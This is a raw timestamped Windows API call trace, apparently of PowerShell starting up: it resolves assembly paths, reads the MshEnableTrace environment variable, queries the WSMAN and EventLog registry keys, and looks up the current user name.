	[0413.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0413.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0413.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0413.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0413.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0414.343] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0414.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.343] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0414.344] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0414.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.344] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0414.346] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0414.346] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.346] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0414.347] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0414.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.347] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0414.355] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0414.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.621] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0414.626] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0414.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.626] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0414.627] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0414.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.627] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0414.635] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d4b8 | out: phkResult=0x20d4b8*=0x2fc) returned 0x0
	[0414.638] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d3bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d3b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d3bc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d3b8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.639] CoTaskMemFree (pv=0x0) 
	[0414.639] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0414.639] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x2ec760, lpcchValueName=0x20d468, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x20d468, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0414.640] CoTaskMemFree (pv=0x2ec760) 
	[0414.640] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0414.640] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x2ec760, lpcchValueName=0x20d468, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x20d468, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0414.640] CoTaskMemFree (pv=0x2ec760) 
	[0414.640] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0414.640] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x2ec760, lpcchValueName=0x20d468, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x20d468, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0414.640] CoTaskMemFree (pv=0x2ec760) 
	[0414.641] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20d44c, lpData=0x0, lpcbData=0x20d448*=0x0 | out: lpType=0x20d44c*=0x1, lpData=0x0, lpcbData=0x20d448*=0x8) returned 0x0
	[0414.641] CoTaskMemAlloc (cb=0xc) returned 0x360c70
	[0414.641] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20d41c, lpData=0x360c70, lpcbData=0x20d418*=0x8 | out: lpType=0x20d41c*=0x1, lpData="2.0", lpcbData=0x20d418*=0x8) returned 0x0
	[0414.641] CoTaskMemFree (pv=0x360c70) 
	[0415.382] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d408 | out: phkResult=0x20d408*=0x2fc) returned 0x0
	[0415.382] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d30c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d308, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d30c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d308*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.382] CoTaskMemFree (pv=0x0) 
	[0415.382] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0415.382] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x2ec760, lpcchValueName=0x20d3b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x20d3b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0415.382] CoTaskMemFree (pv=0x2ec760) 
	[0415.382] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0415.382] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x2ec760, lpcchValueName=0x20d3b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x20d3b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0415.382] CoTaskMemFree (pv=0x2ec760) 
	[0415.382] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0415.382] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x2ec760, lpcchValueName=0x20d3b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x20d3b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0415.382] CoTaskMemFree (pv=0x2ec760) 
	[0415.382] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20d39c, lpData=0x0, lpcbData=0x20d398*=0x0 | out: lpType=0x20d39c*=0x1, lpData=0x0, lpcbData=0x20d398*=0x8) returned 0x0
	[0415.382] CoTaskMemAlloc (cb=0xc) returned 0x360850
	[0415.382] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20d36c, lpData=0x360850, lpcbData=0x20d368*=0x8 | out: lpType=0x20d36c*=0x1, lpData="2.0", lpcbData=0x20d368*=0x8) returned 0x0
	[0415.383] CoTaskMemFree (pv=0x360850) 
	[0415.384] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0415.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.384] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0415.389] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0415.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.389] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0415.394] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d438 | out: phkResult=0x20d438*=0x1c0) returned 0x0
	[0415.397] RegQueryInfoKeyW (in: hKey=0x1c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d3ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d3a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d3ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d3a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.397] CoTaskMemFree (pv=0x0) 
	[0415.398] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0415.398] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x0, lpName=0x2ec760, lpcchName=0x20d438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20d438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.398] CoTaskMemFree (pv=0x2ec760) 
	[0415.398] CoTaskMemFree (pv=0x0) 
	[0415.398] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0415.398] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x1, lpName=0x2ec760, lpcchName=0x20d438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20d438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.398] CoTaskMemFree (pv=0x2ec760) 
	[0415.398] CoTaskMemFree (pv=0x0) 
	[0415.398] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0415.398] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x2, lpName=0x2ec760, lpcchName=0x20d438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20d438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.398] CoTaskMemFree (pv=0x2ec760) 
	[0415.398] CoTaskMemFree (pv=0x0) 
	[0415.398] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0415.398] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x3, lpName=0x2ec760, lpcchName=0x20d438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20d438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.398] CoTaskMemFree (pv=0x2ec760) 
	[0415.398] CoTaskMemFree (pv=0x0) 
	[0415.398] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0415.398] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x4, lpName=0x2ec760, lpcchName=0x20d438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20d438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.398] CoTaskMemFree (pv=0x2ec760) 
	[0415.398] CoTaskMemFree (pv=0x0) 
	[0415.398] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0415.398] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x5, lpName=0x2ec760, lpcchName=0x20d438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20d438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.399] CoTaskMemFree (pv=0x2ec760) 
	[0415.399] CoTaskMemFree (pv=0x0) 
	[0415.399] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0415.399] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x6, lpName=0x2ec760, lpcchName=0x20d438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20d438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.399] CoTaskMemFree (pv=0x2ec760) 
	[0415.399] CoTaskMemFree (pv=0x0) 
	[0415.399] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0415.399] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x7, lpName=0x2ec760, lpcchName=0x20d438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20d438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.399] CoTaskMemFree (pv=0x2ec760) 
	[0415.399] CoTaskMemFree (pv=0x0) 
	[0415.399] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0415.399] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x8, lpName=0x2ec760, lpcchName=0x20d438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20d438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.399] CoTaskMemFree (pv=0x2ec760) 
	[0415.399] CoTaskMemFree (pv=0x0) 
	[0415.399] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x300) returned 0x0
	[0415.399] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x0) returned 0x2
	[0415.399] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x304) returned 0x0
	[0415.399] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x0) returned 0x2
	[0415.399] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x318) returned 0x0
	[0415.399] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x0) returned 0x2
	[0415.400] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x1c4) returned 0x0
	[0415.400] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x0) returned 0x2
	[0415.400] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x32c) returned 0x0
	[0415.400] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x0) returned 0x2
	[0415.400] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x330) returned 0x0
	[0415.400] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x0) returned 0x2
	[0415.400] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x334) returned 0x0
	[0415.400] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x0) returned 0x2
	[0415.400] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x338) returned 0x0
	[0415.400] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x0) returned 0x2
	[0415.400] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x33c) returned 0x0
	[0415.401] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d498 | out: phkResult=0x20d498*=0x340) returned 0x0
	[0415.401] RegCloseKey (hKey=0x340) returned 0x0
	[0415.401] RegCloseKey (hKey=0x1c0) returned 0x0
	[0415.402] RegCloseKey (hKey=0x33c) returned 0x0
	[0415.415] CoTaskMemAlloc (cb=0x804) returned 0x1b8c5130
	[0415.696] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8c5130, nSize=0x20d6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d6a8) returned 0x1
	[0415.697] CoTaskMemFree (pv=0x1b8c5130) 
	[0415.699] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0415.699] GetUserNameW (in: lpBuffer=0x2ec760, pcbBuffer=0x20d6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d6e8) returned 1
	[0415.699] CoTaskMemFree (pv=0x2ec760) 
	[0416.189] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3e8 | out: phkResult=0x20d3e8*=0x344) returned 0x0
	[0416.189] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d35c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d358, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d35c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d358*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.189] CoTaskMemFree (pv=0x0) 
	[0416.189] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.189] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.189] CoTaskMemFree (pv=0x2ec760) 
	[0416.189] CoTaskMemFree (pv=0x0) 
	[0416.189] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.189] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.189] CoTaskMemFree (pv=0x2ec760) 
	[0416.189] CoTaskMemFree (pv=0x0) 
	[0416.189] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.189] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.189] CoTaskMemFree (pv=0x2ec760) 
	[0416.189] CoTaskMemFree (pv=0x0) 
	[0416.189] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.189] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.190] CoTaskMemFree (pv=0x2ec760) 
	[0416.190] CoTaskMemFree (pv=0x0) 
	[0416.190] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.190] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.190] CoTaskMemFree (pv=0x2ec760) 
	[0416.190] CoTaskMemFree (pv=0x0) 
	[0416.190] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.190] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.190] CoTaskMemFree (pv=0x2ec760) 
	[0416.190] CoTaskMemFree (pv=0x0) 
	[0416.190] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.190] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.190] CoTaskMemFree (pv=0x2ec760) 
	[0416.190] CoTaskMemFree (pv=0x0) 
	[0416.190] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.190] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.190] CoTaskMemFree (pv=0x2ec760) 
	[0416.190] CoTaskMemFree (pv=0x0) 
	[0416.190] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.190] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x2ec760, lpcchName=0x20d3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20d3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0416.190] CoTaskMemFree (pv=0x2ec760) 
	[0416.190] CoTaskMemFree (pv=0x0) 
	[0416.190] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x348) returned 0x0
	[0416.190] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.191] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x34c) returned 0x0
	[0416.191] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.191] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x350) returned 0x0
	[0416.191] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.191] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x354) returned 0x0
	[0416.191] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.191] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x358) returned 0x0
	[0416.191] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x0) returned 0x2
	[0416.191] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d448 | out: phkResult=0x20d448*=0x35c) returned 0x0
